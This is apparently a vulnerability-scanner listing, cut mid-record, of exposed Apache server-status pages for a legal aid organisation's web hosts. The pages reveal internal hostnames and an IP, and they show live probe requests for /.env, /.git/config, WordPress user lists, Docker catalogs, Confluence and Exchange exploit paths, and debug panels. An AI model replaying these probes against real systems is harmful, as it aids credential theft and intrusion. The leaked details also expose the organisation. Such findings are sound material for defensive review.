0.2902980228.60.2412283.25 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 8-114208470/0/236968W 0.00000.00.0011522.02 130.176.208.180http/1.1survey.alas.org:8080GET / HTTP/1.1 9-114208481/1/226037W 0.00001.00.0011118.77 130.176.208.180http/1.1atlantalegalaid.org:8080GET /s/31332e33322e39392e3335/_/;/META-INF/maven/com.atlassian. 10-114200193/20/214603K 1.960034.31.3810231.72 130.176.208.180http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 11-114208490/0/192015W 0.00000.00.009331.32 130.176.208.180http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-114203640/4/176706W 0.01300.00.018770.57 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 13-114-0/0/168045. 0.002700.00.008058.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-114-0/0/156062. 0.672900.00.007530.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-114203841/4/149535W 0.260032.10.147254.50 130.176.208.180http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-114203853/6/134164W 0.240034.30.136324.92 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 17-114196100/68/112398W 7.18300.01.665336.07 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-114-0/0/103348. 0.00300.00.005128.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114199137/50/93816K 2.790055.72.534748.63 130.176.208.180http/1.1on.alas.org:8080GET /login.action HTTP/1.1 20-114-0/0/93897. 0.00600.00.004523.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114-0/0/86189. 0.01800.00.004051.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-114204010/3/84815W 0.00300.00.024104.68 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 23-114204061/3/79166W 0.250032.10.103708.97 130.176.208.180http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 24-114-0/0/71766. 0.00400.00.003443.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-114204243/5/38023W 0.180049.70.181723.73 130.176.208.138http/1.1elearning.alas.org:8080GET / HTTP/1.1 26-114204251/3/30101W 0.230032.10.041388.60 130.176.208.138http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 27-114204300/3/27630W 0.06300.00.091253.80 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-114204357/9/25407K 0.090012.70.021161.23 130.176.208.180http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 29-114200922/21/23706W 1.550033.24.691038.52 130.176.208.180http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 30-114204404/6/25343W 0.18004.40.011138.77 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-114-0/0/23299. 0.00700.00.001016.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/24122. 0.00500.00.001138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/23754. 0.002400.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114204525/7/24933W 0.100045.80.051086.46 130.176.208.180http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 35-114204615/7/26408W 0.110046.20.051149.00 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 36-114204621/3/22941W 0.230032.10.051008.30 130.176.208.180http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 37-114-0/0/23493. 1.932300.00.001057.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-114204673/5/23017K 0.240034.20.051015.32 130.176.208.180http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 39-114-0/0/22430. 1.552200.00.00936.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-114204725/7/23688W 0.110046.10.07997.71 130.176.208.148http/1.1elearning.alas.org:8080GET / HTTP/1.1 41-114204770/3/4958W 0.03300.00.02210.14 130.176.208.138http/1.1intranet.alas.org:8080GET / HTTP/1.1 42-114-0/0/2822. 0.00200.00.00108.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204872/4/3165K 0.240033.20.08137.28 130.176.208.180http/1.1on.alas.org:8080GET /config.json HTTP/1.1 44-114205044/6/1987W 0.11009.60.01129.48 130.176.208.180http/1.1survey.alas.org:8080GET /about HTTP/1.1 45-114205054/6/1930K 0.18004.50.0495.15 130.176.208.180http/1.1on.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 46-114-0/0/1812. 0.001800.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114205155/7/1940K 0.18050850.80.0584.48 130.176.208.180http/1.1survey.alas.org:8080GET /about HTTP/1.1 48-114-0/0/1562. 0.001600.00.0052.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1458. 0.001700.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1288. 0.001500.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1482. 0.001400.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114205320/3/1868W 0.12300.00.0151.05 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 53-114-0/0/1209. 0.001300.00.0043.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-114205461/4/1388W 0.29000.90.0162.40 130.176.208.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea23ae4aaa
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:05 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 24 seconds Server load: 2.50 0.54 0.17 Total accesses: 5117175 - Total Traffic: 242.1 GB CPU Usage: u32.84 s4.33 cu0 cs0 - .000375% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 118 requests currently being processed, 0 idle workers WKWWWWWWWWKWWWWWWWWWWWKWWKKKWWWWKWWWWWWKWKWWWWWWWWWWWWKKKWWWWWKW WKWWWWWKWWWWWWWWKWKKWWWKWKWWWKKWWWWWWWWWWWWWWWWWWWWKKK.......... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208261/1/315813W 0.18300.90.0015274.52 130.176.208.180http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 1-114208365/5/307282K 0.2803164190.20.1915604.01 130.176.208.148http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 2-114202774/11/296200W 0.3010231.70.4714399.66 130.176.208.180http/1.1events.alas.org:8080GET /server-status HTTP/1.1 3-114202782/9/291720W 0.2810229.60.2414074.69 130.176.208.148http/1.1events.alas.org:8080GET / HTTP/1.1 4-114202875/16/280071W 0.173050.20.0714108.13 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-114208370/0/270950W 0.00500.00.0013303.78 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 6-114208466/6/257849W 0.140072.60.0712980.21 130.176.208.180http/1.1events.alas.org:8080GET /login.action HTTP/1.1 7-114203472/10/249542W 0.2920229.60.2412283.25 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 8-114208472/2/236970W 0.092042.50.0411522.06 130.176.208.180http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 9-114208481/1/226037W 0.00301.00.0011118.77 130.176.208.180http/1.1atlantalegalaid.org:8080GET /s/31332e33322e39392e3335/_/;/META-INF/maven/com.atlassian. 10-114200193/29/214612K 2.14003.61.4710231.81 130.176.208.180http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 11-114208490/1/192016W 0.18000.00.009331.32 130.176.208.138http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 12-114203640/5/176707W 0.55000.00.018770.57 130.176.208.138http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 13-114208752/2/168047W 0.07106.90.018058.75 130.176.208.138http/1.1atlantalegalaid.org:8080GET /.DS_Store HTTP/1.1 14-114208762/2/156064W 0.080011.80.017530.90 130.176.208.148http/1.1elearning.alas.org:8080GET / HTTP/1.1 15-114203841/4/149535W 0.263032.10.147254.50 130.176.208.180http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-114203854/7/134165W 0.460066.80.166324.95 130.176.208.180http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 17-114196100/77/112407W 7.72000.01.685336.09 130.176.208.138http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 18-114208772/2/103350W 0.00202.10.005128.80 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-114199130/51/93817W 2.96000.02.624748.71 130.176.208.180http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 20-114208782/2/93899W 0.00106.90.014523.83 130.176.208.148http/1.1survey.alas.org:8080GET /about HTTP/1.1 21-114208791/3/86192W 0.08105.90.014051.44 130.176.208.180http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 22-114204013/6/84818K 0.4301317240.30.264104.91 130.176.208.180http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 23-114204061/3/79166W 0.253032.10.103708.97 130.176.208.180http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 24-114208802/2/71768W 0.01105.60.013443.05 130.176.208.180http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 25-114204246/8/38026K 0.410084.30.221723.77 130.176.208.138http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 26-114204255/7/30105K 0.390081.50.091388.64 130.176.208.138http/1.1on.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 27-114204301/6/27633K 0.61057115.10.201253.92 15.158.50.39http/1.1atlantalegalaid.org:8080GET /alas/wp-content/uploads/2021/09/DV-Awareness-Graphics-6-10 28-114204358/10/25408W 0.092013.70.021161.23 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 29-114200924/23/23708W 1.641080.34.741038.57 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 30-114204406/8/25345W 0.400037.90.041138.81 130.176.208.180http/1.1events.alas.org:8080GET /config.json HTTP/1.1 31-114208812/2/23301W 0.01102.50.001016.81 130.176.208.148http/1.1survey.alas.org:8080GET / HTTP/1.1 32-114208824/5/24127K 0.09004.40.041138.34 130.176.208.180http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 33-114209221/1/23755W 0.00101.00.001123.81 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-114204525/7/24933W 0.103045.80.051086.46 130.176.208.180http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 35-114204619/11/26412W 0.191055.60.061149.01 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-114204623/5/22943W 0.391045.40.061008.31 130.176.208.180http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 37-114209231/1/23494W 0.00101.20.001057.31 130.176.208.138http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 38-114204673/5/23017W 0.243034.20.051015.32 130.176.208.180http/1.1events.alas.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 39-114209243/3/22433K 0.00003.10.00936.86 130.176.208.148http/1.1on.alas.org:8080GET /about HTTP/1.1 40-114204726/8/23689W 0.350078.60.10997.74 130.176.208.148http/1.1events.alas.org:8080GET /config.json HTTP/1.1 41-114204771/5/4960K 0.56001.00.02210.15 130.176.208.138http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 42-114209250/0/2822W 0.00200.00.00108.29 130.176.208.138http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 43-114204872/4/3165W 0.243033.20.08137.28 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-114205046/8/1989W 0.192016.40.02129.48 130.176.208.180http/1.1events.alas.org:8080GET /.env HTTP/1.1 45-114205054/6/1930W 0.18304.50.0495.15 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 46-114209260/0/1812W 0.00200.00.0048.06 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 47-114205156/8/1941W 0.261056.60.0684.48 130.176.208.180http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 48-114209270/2/1564W 0.09000.00.0452.66 130.176.208.148http/1.1esign.alas.org:8080GET / HTTP/1.1 49-114209281/1/1459W 0.00001.10.0055.34 130.176.208.148http/1.1events.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 50-114209294/4/1292W 0.00004.80.0057.45 130.176.208.180http/1.1events.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 51-114209301/1/1483W 0.00101.10.0057.39 130.176.208.138http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feab781dccd
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:57 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 16 seconds Server load: 4.64 0.98 0.31 Total accesses: 2348238 - Total Traffic: 111.6 GB CPU Usage: u44.77 s5.32 cu0 cs0 - .00106% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 137 requests currently being processed, 0 idle workers KKKWKWKKWWWWWKWKWWWWWKWWKKKKWKKKKWWWWWWWKKWWWWWKWKKWKKWWWWWWWKWW WWWWKKKKKWKKKKKWKWWWKKKKKKKKKKKWKKKKKWKKKWWKWWKWKWWWWWWWWWWWKKWK KKKKWWWKK............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-542843911/12/149115K 1.051044.90.117129.90 70.132.63.132http/1.1elearning.alas.org:8080GET /config.json HTTP/1.1 1-54282744/23/146312K 0.7218344.80.477406.38 70.132.63.132http/1.1esign.alas.org:8080GET / HTTP/1.1 2-54282791/21/138689K 2.38101.00.406786.84 70.132.63.132http/1.1elearning.alas.org:8080GET /info.php HTTP/1.1 3-54284440/2/138058W 0.49300.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284515/5/132814K 1.1810233.10.236872.41 70.132.63.132http/1.1short.alas.org:8080GET /config.json HTTP/1.1 5-54277790/74/127549W 5.68400.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284279/12/123207K 1.971042.40.156154.80 70.132.63.132http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279607/55/116763K 5.531051.81.125991.82 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 8-54284280/7/111211W 2.40000.00.015413.78 70.132.63.80http/1.1survey.alas.org:8080GET / HTTP/1.1 9-54284528/8/109799W 0.5330113.60.115360.51 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-54284613/3/103116W 0.435066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284626/6/90825W 0.243038.70.044417.10 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284630/5/81749W 0.69000.00.084061.27 70.132.63.80http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 13-54283945/10/76025K 1.21106.60.023612.14 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 14-54277906/74/71384W 5.785047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-542846411/11/68079K 0.301080.40.083513.42 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 16-54284811/1/58812W 0.215032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283050/14/48131W 1.34400.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00501.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/3/40557W 0.69200.00.211989.78 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00501.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284898/8/35250K 0.201010.80.011733.90 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 22-54284901/1/38395W 0.00501.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284911/1/34535W 0.6830228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284926/6/31221K 0.112124052.60.051522.00 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 25-54285217/7/16889K 0.091048.80.05728.46 70.132.63.132http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 26-54285228/8/11332K 0.100452.80.05570.89 70.132.63.132http/1.1esign.alas.org:8080GET /.env HTTP/1.1 27-54285237/7/11705K 0.01107.30.01472.32 70.132.63.132http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 28-54285240/0/9875W 0.00500.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285254/4/9779K 0.241043.20.04403.59 70.132.63.132http/1.1short.alas.org:8080GET /.env HTTP/1.1 30-54285264/4/10666K 0.31098048.90.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 31-54285273/3/9052K 0.331116475.80.07376.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 32-54285284/4/10171K 0.09013210.70.01452.29 70.132.63.80http/1.1esign.alas.org:8080GET /s/31332e3232342e3138392e3436/_/;/META-INF/maven/com.atlass 33-54285331/1/10592W 0.00501.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00501.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00500.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00500.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00500.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00301.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00500.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285924/4/10175K 0.271122545.70.04360.73 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 41-54286011/2/2151K 0.23101.10.0278.69 70.132.63.80http/1.1short.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00400.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/3/1037W 0.18100.00.0144.99 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00400.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00400.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00301.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286073/3/1012K 0.091043.40.0446.80 70.132.63.132http/1.1on.alas.org:8080GET /login.action HTTP/1.1 48-54286080/1/686W 0.23000.00.0220.89 70.132.63.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 49-54286094/4/698K 0.11014345.70.0421.45 70.132.63.132http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 50-54286107/7/630K 0.00107.30.0128.45 70.132.63.132http/1.1short.alas.org:8080GET /login.action HTTP/1.1 51-54286432/2/740W 0.052028.40.0327.28 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 52-54286484/4/683K 0.05262631.40.0321.07 70.132.63.132http/1.1on.alas.org:8080GET /info.php HTTP/1.1 53-54286496/6/500K 0.02108.80.0120.14 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea7e7a1afa
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:53 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 12 seconds Server load: 0.17 0.05 0.01 Total accesses: 2348011 - Total Traffic: 111.6 GB CPU Usage: u62.5 s7.07 cu0 cs0 - .00147% CPU load .497 requests/sec - 24.8 kB/second - 49.9 kB/request 73 requests currently being processed, 0 idle workers KKWWWWKKWKWWWKWWWWWWWKWWWKKWWKWWKWWWWWWWKWWWWWWWWWWWWWWWWWWWWWWK WWWWWWWWK....................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284396/7/149110K 1.03013538.30.107129.89 70.132.63.132http/1.1esign.alas.org:8080GET / HTTP/1.1 1-54282741/20/146309K 0.69087541.30.477406.38 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 2-54282795/19/138687W 2.17008.80.376786.81 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-54284440/2/138058W 0.49000.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284513/3/132812W 0.6820231.10.236872.41 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-54277790/74/127549W 5.68100.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284276/9/123204K 1.95010337.90.156154.80 70.132.63.132http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-54279605/53/116761K 5.53096849.71.125991.82 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 8-54284282/6/111210W 1.93202.00.015413.77 70.132.63.132http/1.1intranet.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 9-54284527/7/109798K 0.53060112.60.115360.51 70.132.63.132http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 10-54284613/3/103116W 0.432066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284626/6/90825W 0.240038.70.044417.10 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284633/3/81747W 0.460042.50.044061.24 70.132.63.132http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 13-54283942/7/76022K 1.20002.20.023612.13 70.132.63.132http/1.1events.alas.org:8080GET /.git/config HTTP/1.1 14-54277906/74/71384W 5.781047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-54284648/8/68076W 0.290076.10.073513.42 70.132.63.132http/1.1esign.alas.org:8080GET /info.php HTTP/1.1 16-54284811/1/58812W 0.212032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283050/14/48131W 1.34100.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00201.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/0/40554W 0.00200.00.001989.56 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00201.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284894/4/35246K 0.180815.40.011733.89 70.132.63.132http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 22-54284901/1/38395W 0.00201.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284911/1/34535W 0.6800228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284924/4/31219W 0.01008.80.011521.96 70.132.63.132http/1.1esign.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 25-54285213/3/16885K 0.090044.60.04728.45 70.132.63.132http/1.1elearning.alas.org:8080GET /info.php HTTP/1.1 26-54285223/3/11327K 0.090045.40.04570.89 70.132.63.132http/1.1esign.alas.org:8080GET /.env HTTP/1.1 27-54285233/3/11701W 0.00003.10.00472.32 70.132.63.132http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 28-54285240/0/9875W 0.00100.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285251/1/9776K 0.240173232.10.03403.58 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 30-54285260/0/10662W 0.00100.00.00492.71 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-54285271/1/9050W 0.230032.10.03376.40 70.132.63.132http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 32-54285281/1/10168K 0.001441.40.00452.28 70.132.63.80http/1.1secure.alas.org:8080GET / HTTP/1.1 33-54285331/1/10592W 0.00101.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00101.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00100.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00100.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00100.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00001.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00100.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285923/3/10174K 0.19004.30.00360.69 70.132.63.165http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 41-54286010/0/2149W 0.00000.00.0078.67 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00000.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/0/1034W 0.00000.00.0044.98 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00000.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00000.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00001.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286070/0/1009W 0.00000.00.0046.76 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 48-54286080/0/685W 0.00000.00.0020.87 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 49-54286090/0/694W 0.00000.00.0021.40 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 50-54286103/3/626K 0.00003.10.0028.44 70.132.63.132http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 51-54286431/1/739W 0.00001.40.0027.26 70.132.63.132http/1.1events.alas.org:8080GET /info.php HTTP/1.1 52-54286482/2/681W 0.00002.00.0021.05 70.132.63.132http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 53-54286492/2/496W 0.00002.10.0020.14 70.132.63.132http/1.1
Severity: medium
